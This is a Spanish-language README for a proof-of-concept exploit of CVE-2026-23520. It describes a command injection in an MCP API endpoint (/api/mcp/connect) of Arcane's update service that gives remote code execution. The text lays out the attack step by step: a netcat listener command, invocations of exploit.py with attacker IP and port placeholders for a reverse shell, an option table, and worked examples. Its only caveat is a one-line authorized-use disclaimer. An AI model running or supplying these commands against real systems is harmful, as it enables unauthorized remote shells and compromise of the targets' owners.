
Prueba de concepto de exploit para CVE-2026-23520, una vulnerabilidad de inyección de comandos en el servicio de actualización de Arcane, que permite la ejecución remota de código mediante solicitudes API manipuladas.
Este repositorio contiene un PoC (Prueba de Concepto) de explotación para una vulnerabilidad de Ejecución Remota de Comandos (RCE) que afecta a aplicaciones que exponen un endpoint vulnerable de la API MCP (comúnmente /api/mcp/connect).
La vulnerabilidad permite la ejecución de comandos a nivel de sistema mediante una solicitud API manipulada.
nc -lvnp ATTACKER_PORT
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]
| Argumento | Descripción |
|---|---|
| target | IP, dominio o URL del objetivo |
| --lhost | IP del atacante |
| --lport | Puerto del atacante |
| Flag | Descripción |
|---|---|
| -p, --port | Puerto del objetivo (predeterminado: 443) |
| -s, --scheme | http o https (predeterminado: https) |
| -e, --endpoint | Ruta del endpoint de la API |
| -t, --timeout | Tiempo de espera de la solicitud |
| -v, --verbose | Salida de depuración |
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444
/bin/bash está disponible.Solo para pruebas autorizadas y fines educativos.
Parosh B